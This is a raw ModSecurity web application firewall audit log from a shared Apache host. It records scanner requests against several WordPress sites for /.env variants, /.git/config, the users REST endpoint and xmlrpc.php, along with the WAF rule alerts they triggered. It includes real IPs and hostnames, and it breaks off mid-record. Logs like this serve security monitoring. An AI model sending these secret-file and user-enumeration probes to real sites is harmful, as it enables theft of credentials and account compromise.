proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949824289921 1006664 (- - -) Stopwatch2: 1749949824289921 1006664; combined=3232, p1=524, p2=2216, p3=85, p4=55, p5=211, sr=142, sw=141, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d72a5f25-Z-- --1fc8684a-A-- [15/Jun/2025:06:42:25.411066 +0530] aE4d-B6N9C2vdY7GQBUxqwAAAAY 167.250.235.41 47024 127.0.0.1 7081 --1fc8684a-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 689 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1fc8684a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1fc8684a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4d-B6N9C2vdY7GQBUxqwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749949944431272 979888 (- - -) Stopwatch2: 1749949944431272 979888; combined=2065, p1=306, p2=1310, p3=76, p4=57, p5=200, sr=80, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1fc8684a-Z-- --672f3c0e-A-- [15/Jun/2025:06:48:01.515100 +0530] aE4fSIdVJK-eDwr5Vlo32gAAAAc 34.16.212.158 37024 127.0.0.1 7081 --672f3c0e-B-- GET /.git/config HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 34.16.212.158 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --672f3c0e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --672f3c0e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.git/config"] [unique_id "aE4fSIdVJK-eDwr5Vlo32gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749950280049746 1465457 (- - -) Stopwatch2: 1749950280049746 1465457; combined=1590, p1=355, p2=1145, p3=0, p4=0, p5=89, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --672f3c0e-Z-- --cd81ea49-A-- [15/Jun/2025:06:49:30.711896 +0530] aE4foieXHcLENIHhuFcxuwAAAAU 139.59.58.126 34564 127.0.0.1 7081 --cd81ea49-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.thebrandwagon.in X-Real-IP: 139.59.58.126 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=d77e73511e1a6915387b1a8e8a20db4a1749950363 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --cd81ea49-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.thebrandwagon.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --cd81ea49-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.thebrandwagon.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.thebrandwagon.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.thebrandwagon.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE4foieXHcLENIHhuFcxuwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/thebrandwagon.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749950370615367 96615 (- - -) Stopwatch2: 1749950370615367 96615; combined=2062, p1=313, p2=1645, p3=0, p4=0, p5=104, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd81ea49-Z-- --dc26b217-A-- [15/Jun/2025:06:50:39.363675 +0530] aE4f5lIoq-7Cj_2-ZLTUXQAAAAA 172.71.183.88 50114 127.0.0.1 7081 --dc26b217-B-- GET /.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.183.88 X-Forwarded-For: 138.199.7.185 Connection: close cf-ray: 94fe3f019ebc9fc0-AMS cdn-loop: cloudflare; loops=1 cf-ipcountry: NL accept-encoding: gzip, br referer: http://getcalley.com/.env x-forwarded-proto: https cf-connecting-ip: 138.199.7.185 user-agent: Go-http-client/2.0 cf-visitor: {"scheme":"https"} --dc26b217-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --dc26b217-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env"] [unique_id "aE4f5lIoq-7Cj_2-ZLTUXQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749950438930469 433326 (- - -) Stopwatch2: 1749950438930469 433326; combined=2118, p1=402, p2=1588, p3=0, p4=0, p5=127, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc26b217-Z-- --cac0f37e-A-- [15/Jun/2025:07:10:33.154265 +0530] aE4kj4dVJK-eDwr5Vlo5eAAAAAc 83.217.210.41 41366 127.0.0.1 7081 --cac0f37e-B-- GET //.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --cac0f37e-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Pragma: no-cache Expires: Sun, 15 Jun 2025 02:40:33 GMT Cache-Control: max-age=3600 X-Redirect-By: WordPress Set-Cookie: PHPSESSID=h66e3p8n0809vpt4up9b08gmar; path=/ Set-Cookie: _sfs_id=149017e998cbc237829f9bfaf72a49ba1749951632; expires=Sun, 15 Jun 2025 02:40:32 GMT; Max-Age=3600; path=/; secure; HttpOnly Location: https://www.gulachi.com/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --cac0f37e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env"] [unique_id "aE4kj4dVJK-eDwr5Vlo5eAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749951631360292 1794053 (- - -) Stopwatch2: 1749951631360292 1794053; combined=1817, p1=373, p2=1361, p3=0, p4=0, p5=83, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cac0f37e-Z-- --693e3927-A-- [15/Jun/2025:07:10:35.334625 +0530] aE4kkWydX8vZg3SgqNzObwAAAAI 83.217.210.41 41426 127.0.0.1 7081 --693e3927-B-- GET /.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://www.gulachi.com//.env accept-encoding: gzip --693e3927-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=vgurpjks4pof9vrg31fcor53ko; path=/ Set-Cookie: _sfs_id=2ff618307c81758c6fddb088ffc652ed1749951634; expires=Sun, 15 Jun 2025 02:40:34 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --693e3927-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env"] [unique_id "aE4kkWydX8vZg3SgqNzObwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749951633518580 1816124 (- - -) Stopwatch2: 1749951633518580 1816124; combined=154441, p1=401, p2=1418, p3=0, p4=0, p5=76359, sr=122, sw=1, l=0, gc=76262 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --693e3927-Z-- --d15cf47e-A-- [15/Jun/2025:07:12:07.992616 +0530] aE4k74dVJK-eDwr5Vlo5kQAAAAc 152.42.226.41 40884 127.0.0.1 7081 --d15cf47e-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 152.42.226.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 --d15cf47e-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --d15cf47e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.3econcepts.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE4k74dVJK-eDwr5Vlo5kQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749951727206226 786495 (- - -) Stopwatch2: 1749951727206226 786495; combined=2041, p1=343, p2=1586, p3=0, p4=0, p5=112, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d15cf47e-Z-- --7a685860-A-- [15/Jun/2025:07:12:15.340190 +0530] aE4k9odVJK-eDwr5Vlo5lAAAAAc 152.42.226.41 35258 127.0.0.1 7081 --7a685860-B-- POST //xmlrpc.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 152.42.226.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 484 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7a685860-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7a685860-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 152.42.226.41 (+1 hits since last alert)|www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 152.42.226.41 (+1 hits since last alert)|www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.3econcepts.com"] [uri "/xmlrpc.php"] [unique_id "aE4k9odVJK-eDwr5Vlo5lAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749951734551791 788472 (- - -) Stopwatch2: 1749951734551791 788472; combined=2361, p1=485, p2=1416, p3=53, p4=66, p5=212, sr=141, sw=129, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7a685860-Z-- --d12bc535-A-- [15/Jun/2025:07:13:25.036614 +0530] aE4lPCeXHcLENIHhuFczcAAAAAU 138.199.7.185 52536 127.0.0.1 7081 --d12bc535-B-- GET /.env HTTP/1.0 Host: www.rsda.in X-Real-IP: 138.199.7.185 X-Accel-Internal: /internal-nginx-static-location Connection: close referer: http://rsda.in/.env accept-encoding: gzip user-agent: Go-http-client/2.0 --d12bc535-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --d12bc535-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.rsda.in"] [uri "/.env"] [unique_id "aE4lPCeXHcLENIHhuFczcAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749951804645194 391481 (- - -) Stopwatch2: 1749951804645194 391481; combined=1585, p1=356, p2=1137, p3=0, p4=0, p5=92, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d12bc535-Z-- --c3e5b37b-A-- [15/Jun/2025:07:17:24.715279 +0530] aE4mK8H4SeX80EzN5eWZdwAAAAs 104.164.104.2 54874 127.0.0.1 7081 --c3e5b37b-B-- GET /.git/config HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 104.164.104.2 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 Accept-Charset: utf-8 Accept-Encoding: gzip --c3e5b37b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.csquaretech.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --c3e5b37b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.csquaretech.com"] [uri "/.git/config"] [unique_id "aE4mK8H4SeX80EzN5eWZdwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/csquaretech.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952043678325 1037018 (- - -) Stopwatch2: 1749952043678325 1037018; combined=1902, p1=373, p2=1441, p3=0, p4=0, p5=87, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3e5b37b-Z-- --b241730d-A-- [15/Jun/2025:07:18:23.666393 +0530] aE4mZsH4SeX80EzN5eWZhAAAAAs 185.177.72.144 39596 127.0.0.1 7081 --b241730d-B-- GET /.env HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b241730d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=129c313d783a5ed92f5524d2077b77e31749952103; expires=Sun, 15 Jun 2025 02:48:23 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --b241730d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.env"] [unique_id "aE4mZsH4SeX80EzN5eWZhAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952102435919 1230542 (- - -) Stopwatch2: 1749952102435919 1230542; combined=1689, p1=403, p2=1199, p3=0, p4=0, p5=86, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b241730d-Z-- --33a09307-A-- [15/Jun/2025:07:18:25.012913 +0530] aE4mZ-Gp91NCs5RsuUFncQAAAAE 185.177.72.144 39652 127.0.0.1 7081 --33a09307-B-- GET /.env.bak HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --33a09307-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=78a1a15d8a2dc7562171b10793eb02fc1749952104; expires=Sun, 15 Jun 2025 02:48:24 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --33a09307-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.retaxis.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.env.bak"] [unique_id "aE4mZ-Gp91NCs5RsuUFncQAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.retaxis.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/.env.bak"] [unique_id "aE4mZ-Gp91NCs5RsuUFncQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952103792302 1220678 (- - -) Stopwatch2: 1749952103792302 1220678; combined=2008, p1=390, p2=1494, p3=0, p4=0, p5=124, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33a09307-Z-- --15996439-A-- [15/Jun/2025:07:18:26.345130 +0530] aE4macQgjKnP_-nTjoBtYwAAAAM 185.177.72.144 39688 127.0.0.1 7081 --15996439-B-- GET /.env.example HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --15996439-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=42f77308696ca0caa500b0db5cb494531749952106; expires=Sun, 15 Jun 2025 02:48:26 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13614 Connection: close Content-Type: text/html; charset=UTF-8 --15996439-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.retaxis.com"] [uri "/.env.example"] [unique_id "aE4macQgjKnP_-nTjoBtYwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749952105187344 1157852 (- - -) Stopwatch2: 1749952105187344 1157852; combined=1881, p1=419, p2=1378, p3=0, p4=0, p5=83, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --15996439-Z-- --df85b521-A-- [15/Jun/2025:07:18:27.609356 +0530] aE4masH4SeX80EzN5eWZhQAAAAs 185.177.72.144 39716 127.0.0.1 7081 --df85b521-B-- GET /.env.local HTTP/1.0 Host: www.retaxis.com X-Real-IP: 185.177.72.144 X-Accel-Internal: 